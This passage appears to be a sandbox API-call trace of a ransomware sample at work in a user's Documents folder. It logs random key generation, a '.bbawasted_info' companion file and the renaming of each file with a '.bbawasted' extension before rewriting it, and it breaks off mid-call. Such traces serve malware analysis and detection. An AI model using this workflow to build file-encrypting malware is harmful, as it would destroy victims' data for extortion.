[0071.381] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.381] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.381] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\z9-C7bowL.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\z9-c7bowl.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.382] WriteFile (in: hFile=0xf8, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.383] SetEndOfFile (hFile=0xf8) returned 1 [0071.383] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.383] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.383] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\z9-C7bowL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\z9-c7bowl.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\z9-C7bowL.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\z9-c7bowl.pptx.bbawasted")) returned 1 [0071.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\z9-C7bowL.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\z9-c7bowl.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.386] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.458] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.459] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.459] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.459] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.460] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.460] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.468] SetEndOfFile (hFile=0xf8) returned 1 [0071.470] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.470] CloseHandle (hObject=0xf8) returned 1 [0071.472] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.472] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.473] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.473] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6e3aKwHq.pptx") returned 57 [0071.473] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0071.473] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.473] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.473] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.474] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.474] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6e3aKwHq.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6e3akwhq.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.476] WriteFile (in: hFile=0xf8, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.477] SetEndOfFile (hFile=0xf8) returned 1 [0071.477] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.477] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.477] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6e3aKwHq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6e3akwhq.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6e3aKwHq.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6e3akwhq.pptx.bbawasted")) returned 1 [0071.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6e3aKwHq.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6e3akwhq.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.478] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.479] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.480] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.480] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.480] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.481] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.481] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.489] SetEndOfFile (hFile=0xf8) returned 1 [0071.491] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.491] CloseHandle (hObject=0xf8) returned 1 [0071.493] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.493] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.493] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.493] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6umN 0pb.odt") returned 56 [0071.494] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0071.494] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.494] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.494] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.494] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.494] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6umN 0pb.odt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6umn 0pb.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.495] WriteFile (in: hFile=0xf8, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.496] SetEndOfFile (hFile=0xf8) returned 1 [0071.496] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.496] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.496] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6umN 0pb.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6umn 0pb.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6umN 0pb.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6umn 0pb.odt.bbawasted")) returned 1 [0071.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6umN 0pb.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6umn 0pb.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.537] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.538] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.539] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.539] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.539] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.540] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.540] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.548] SetEndOfFile (hFile=0xf8) returned 1 [0071.551] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca828 | out: hHeap=0x580000) returned 1 [0071.551] CloseHandle (hObject=0xf8) returned 1 [0071.552] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.552] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.553] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.553] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78vkkBqzN019txzJe2k.pptx") returned 68 [0071.553] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5c77b0 [0071.553] lstrcpyW (in: lpString1=0x5c7838, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.553] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca828 [0071.553] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.554] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca828 | out: pbBuffer=0x5ca828) returned 1 [0071.554] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78vkkBqzN019txzJe2k.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\78vkkbqzn019txzje2k.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.555] WriteFile (in: hFile=0xf8, lpBuffer=0x5ca828*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5ca828*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.556] SetEndOfFile (hFile=0xf8) returned 1 [0071.556] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.556] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca828 | out: hHeap=0x580000) returned 1 [0071.556] lstrcpyW (in: lpString1=0x5c7838, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78vkkBqzN019txzJe2k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\78vkkbqzn019txzje2k.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78vkkBqzN019txzJe2k.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\78vkkbqzn019txzje2k.pptx.bbawasted")) returned 1 [0071.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78vkkBqzN019txzJe2k.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\78vkkbqzn019txzje2k.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.557] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.559] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.560] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.560] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.560] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.561] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.561] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.569] SetEndOfFile (hFile=0xf8) returned 1 [0071.571] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca828 | out: hHeap=0x580000) returned 1 [0071.571] CloseHandle (hObject=0xf8) returned 1 [0071.573] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.573] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.573] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.573] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAPukr.docx") returned 55 [0071.574] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5d0700 [0071.574] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.574] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca828 [0071.574] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.574] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca828 | out: pbBuffer=0x5ca828) returned 1 [0071.574] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAPukr.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bapukr.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.583] WriteFile (in: hFile=0xf8, lpBuffer=0x5ca828*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5ca828*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.584] SetEndOfFile (hFile=0xf8) returned 1 [0071.653] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca828 | out: hHeap=0x580000) returned 1 [0071.653] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.653] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAPukr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bapukr.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAPukr.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bapukr.docx.bbawasted")) returned 1 [0071.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAPukr.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bapukr.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.654] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.655] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.656] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.656] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.656] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.657] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.657] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.665] SetEndOfFile (hFile=0xf8) returned 1 [0071.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.667] CloseHandle (hObject=0xf8) returned 1 [0071.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.669] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.670] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.670] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gB-_tbRT.ots") returned 56 [0071.670] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0071.670] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.670] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.670] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.671] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.671] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gB-_tbRT.ots.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gb-_tbrt.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.671] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.672] SetEndOfFile (hFile=0xf8) returned 1 [0071.672] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.672] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.673] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gB-_tbRT.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gb-_tbrt.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gB-_tbRT.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gb-_tbrt.ots.bbawasted")) returned 1 [0071.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gB-_tbRT.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gb-_tbrt.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.674] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.675] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.676] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.676] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.676] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.677] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.677] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.732] SetEndOfFile (hFile=0xf8) returned 1 [0071.734] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.734] CloseHandle (hObject=0xf8) returned 1 [0071.736] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.739] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.740] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.740] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jOMFtqWc.pptx") returned 57 [0071.740] RtlAllocateHeap 